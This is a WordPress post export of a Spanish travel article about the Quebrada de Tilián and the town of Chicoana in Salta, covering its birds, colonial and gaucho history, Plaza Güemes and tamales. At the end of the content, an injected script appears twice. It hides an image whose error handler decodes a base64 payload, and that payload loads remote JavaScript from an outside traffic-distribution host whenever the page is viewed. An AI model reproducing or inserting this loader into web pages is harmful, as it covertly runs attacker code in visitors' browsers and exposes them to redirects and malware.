{"id":1298,"date":"2022-08-15T13:00:18","date_gmt":"2022-08-15T16:00:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1298"},"modified":"2025-08-14T00:38:34","modified_gmt":"2025-08-14T03:38:34","slug":"magia-en-la-quebrada","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1298","title":{"rendered":"Magia en la quebrada"},"content":{"rendered":"\n<h6 class=\"has-text-align-right has-text-color wp-block-heading\" style=\"color:#1699d1\">Por: <a href=\"https:\/\/www.nortesocial.com.ar\/magia-en-la-quebrada\/\" target=\"_blank\" rel=\"noreferrer noopener\">Dar\u00edo Illanes<\/a><\/h6>\n\n\n\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#0e6344\"><strong><em>Un Rey del Bosque, desde una tipa blanca, inicia el canto. Y se convierte en concierto junto a Reinamoras, Chingolos, zorzales y encendidas brasitas de fuego. Estalla la naturaleza en la Quebrada de Tili\u00e1n.<\/em><\/strong><\/h4>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft\"><img decoding=\"async\" src=\"http:\/\/www.nortesocial.com.ar\/wp-content\/uploads\/2022\/08\/Tilian07-300x225.jpg\" alt=\"\" class=\"wp-image-2794\"\/><\/figure><\/div>\n\n\n<p>Tres kil\u00f3metros al sur del pueblo de Chicoana est\u00e1 la finca de don Eusebio Silisque. Es el punto de partida para desandar ascendiendo \u2013 al costado, varias veces cruzando \u2013 el cristalino arroyo encerrado entre las rocas y la selva montana de Tili\u00e1n.<\/p>\n\n\n\n<p>Rodeados de laureles del cerro, tipas, algarrobos, nogales, helechos y flores, las p\u00e9treas paredes se estrechan. Hasta llegar a la gruta de la Virgen de F\u00e1tima, poco antes de la cascada que te enmudece y regocija.<\/p>\n\n\n\n<p>Est\u00e1s en la tierra de ind\u00f3mitos pueblos originarios; en donde dicen fue celebrada la primera misa en suelo salte\u00f1o; la cuna de heroicos gauchos; el m\u00e1gico hogar de pobladores amantes de tradiciones, folclore y fe.<\/p>\n\n\n\n<p><strong>Los \u201cchicuanas\u201d<\/strong><\/p>\n\n\n\n<p>Si bien la Arqueolog\u00eda contin\u00faa investigando, es probable que la historia de Chicoana comience 200 a\u00f1os despu\u00e9s de Cristo. En peque\u00f1os poblados de agricultores se habr\u00edan asentado (entre otros) los Tastiles, Vi\u00f1acus, Ampascachis, Guachipas y Tili\u00e1nes. En 1400, los Incas llegaron a los actuales valles Calchaqu\u00ed y Lerma. Y antes de la conquista espa\u00f1ola, la civilizaci\u00f3n cuzque\u00f1a deport\u00f3 a la zona a los belicosos \u201cChicuanas\u201d.<\/p>\n\n\n\n<p>Tras la derrota y asesinato de Atahualpa, en 1576 Gonzalo de Abreu y Figueroa fund\u00f3 \u201cSan Clemente de la Nueva Ciudad de Sevilla\u201d, cerca del actual pueblo. Los Chicuanas la borraron del mapa. D\u00e9cadas despu\u00e9s, los espa\u00f1oles dominaron y, al costado del C\u00e1pac \u00d1an (red vial inca, reconvertida en ruta del Virreinato del Per\u00fa), naci\u00f3 el pueblo llamado Chicoana.<\/p>\n\n\n\n<p><strong>Guerra gaucha<\/strong><\/p>\n\n\n\n<p><em>\u201cEntre las cosas hay una\/ de la que no se arrepiente\/ nadie en la tierra. Esa cosa \/ es haber sido valiente\u201d.&nbsp;<\/em>As\u00ed dice Jorge Luis Borges (Milonga de Jacinto Chiclana), cabi\u00e9ndole el mundialmente famoso poema a los gauchos chicoanenses y su l\u00edder, Luis Burela.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright\"><img decoding=\"async\" src=\"http:\/\/www.nortesocial.com.ar\/wp-content\/uploads\/2022\/08\/Tilian09-300x181.jpg\" alt=\"\" class=\"wp-image-2795\"\/><\/figure><\/div>\n\n\n<p>Hijo de espa\u00f1oles, Chicoana lo vio nacer en 1775. Fue alcalde de la ciudad de Salta en 1809, pero apoy\u00f3 la Revoluci\u00f3n de Mayo. Hartos de los saqueos espa\u00f1oles, en 1814, a la salida de misa, Burela les dijo a sus gauchos que pelear\u00edan contra ellos. Cuando le preguntaron con que armas, \u00e9l les respondi\u00f3:&nbsp;\u201ccon las que les quitemos\u201d. Y naci\u00f3 la guerra gaucha.<\/p>\n\n\n\n<p>Se puso bajo \u00f3rdenes del general y gobernador salte\u00f1o &nbsp;Mart\u00edn Miguel de G\u00fcemes. Lo acompa\u00f1\u00f3 hasta su lecho de muerte, en 1821. En recuerdo del h\u00e9roe chicoanense, en el pueblo se cre\u00f3 el Escuadr\u00f3n Gaucho Coronel. Luis Burela.<\/p>\n\n\n\n<p><strong>Genuino encanto<\/strong><\/p>\n\n\n\n<p>Pueblo de genuino encanto: casas de piedra y adobe; coloniales farolas de hierro; amabilidad, tradici\u00f3n, bonhom\u00eda en pobladores. El apacible ambiente con gusto a otros tiempos se demuestra con plenitud en la plaza G\u00fcemes, coraz\u00f3n de Chicoana.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft\" id=\"attachment_2796\"><img decoding=\"async\" src=\"http:\/\/www.nortesocial.com.ar\/wp-content\/uploads\/2022\/08\/Tilian05-300x225.jpg\" alt=\"\" class=\"wp-image-2796\"\/><figcaption>PLAZA GUEMES<\/figcaption><\/figure><\/div>\n\n\n<p>Verde y aut\u00f3ctonamente florida, el paseo popular posee caracter\u00edsticas \u00fanicas en la Argentina. Conservada casi como era antes, se encuentra cercada para impedir el acceso de vacunos, pero es accesible para las personas mediante molinetes de antigua madera.<\/p>\n\n\n\n<p>Al frente de la plaza, hacia el Oeste, est\u00e1 ubicada la Iglesia San Pablo. Adentro hay obras de arte de la \u00e9poca hispana, entre otras, pinturas cuzque\u00f1as del siglo XVIII.<\/p>\n\n\n\n<p>Y cuando despierta el apetito, antes de rumbear hacia Tili\u00e1n, se hace casi obligatorio conocer porque Chicoana es la Capital Nacional del Tamal.<\/p>\n\n\n\n<p>Conjugando el pasado prehisp\u00e1nico y las tradiciones gauchas, esta es una comida cuyo componente principal es el ma\u00edz. El tamal se hace moliendo en mortero granos de choclo. El relleno esencial es cabeza \u201cguateada\u201d: carne de la cabeza de vaca, cocinada en un hoyo cubierto de brasas.<\/p>\n\n\n\n<p>El resultado se envuelve en las cubiertas de las mazorcas. Disfrutar\u00e1s cuando abras la humeante y fragante bola\u2026<\/p>\n\n\n\n<p><strong><br>COMO LLEGAR<\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.nortesocial.com.ar\/wp-content\/uploads\/2022\/08\/Tilian06-272x300.jpg\" alt=\"\" width=\"197\" height=\"217\"\/><figcaption>SABROSO TAMAL<\/figcaption><\/figure><\/div>\n\n\n<p>Chicoana est\u00e1 47 kil\u00f3metros al suroeste de la Ciudad de Salta. Se accede por la Ruta Nacional 68 y luego por la Ruta Provincial 33 (asfaltadas)<\/p>\n\n\n\n<p>Desde el pueblo, hay que recorrer alrededor de 3 kil\u00f3metros, rumbo sur, para arribar a la finca Tili\u00e1n, punto de partida de la Quebrada del mismo nombre.&nbsp;<strong>Contacto y consultas<\/strong>: 387 5474836.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.nortesocial.com.ar\/magia-en-la-quebrada\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_7-8-2022_19329_www.nortesocial.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-1255\" width=\"270\" height=\"108\"\/><\/a><figcaption>Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Por: Dar\u00edo Illanes Un Rey del Bosque, desde una tipa blanca, inicia el canto. Y se convierte en concierto junto a Reinamoras, Chingolos, zorzales y encendidas brasitas de fuego. Estalla la naturaleza en la Quebrada de Tili\u00e1n. Tres kil\u00f3metros al sur del pueblo de Chicoana est\u00e1 la finca de don Eusebio Silisque. Es el punto [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1299,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-1298","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1298"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1298"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1298\/revisions"}],"predecessor-version":[{"id":7395,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1298\/revisions\/7395"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1299"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1298"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1298"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1298"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}